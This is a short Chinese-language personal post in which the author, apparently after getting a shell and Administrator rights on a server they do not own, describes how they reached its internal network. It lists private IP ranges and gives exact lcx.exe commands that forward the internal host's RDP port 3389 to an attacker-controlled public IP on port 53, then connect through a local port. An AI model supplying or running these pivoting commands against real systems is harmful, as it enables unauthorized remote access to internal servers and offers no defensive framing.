记录个人经验
上次拿到了shell 琢磨了一下内网 在这简直一小白 到处找文章资料看 最后如愿以偿的拿到了服务器
Administrator权限能做多事了
查看一下ip 是内网ip如何看是不是内网ip
A类:10.0.0.0 到10.255.255.255
B类:172.16.0.0 到172.31.255.255
C类:192.168.0.0 到192.168.255.255
还有个169.254.xxx.xxx 也是
看看开放了什么端口
3389开着 刚开始不知道是内网ip直接连失败去网上找了资料
内网端口转发 --lcx.exe工具转发
被控端执行 lcx.exe -slave (公网ip) 53 172.xxx.xxx 3389 将内网3389端口转发到公网53端口;
本机执行 lcx.exe -listen 53 1234 已经反弹到公网53端口了 //将接收到的53端口反弹到1234端口;
我们本地远程连接127.0.01:1234,就可以访问到内网主机,这样我们就可以远程登陆内网服务器
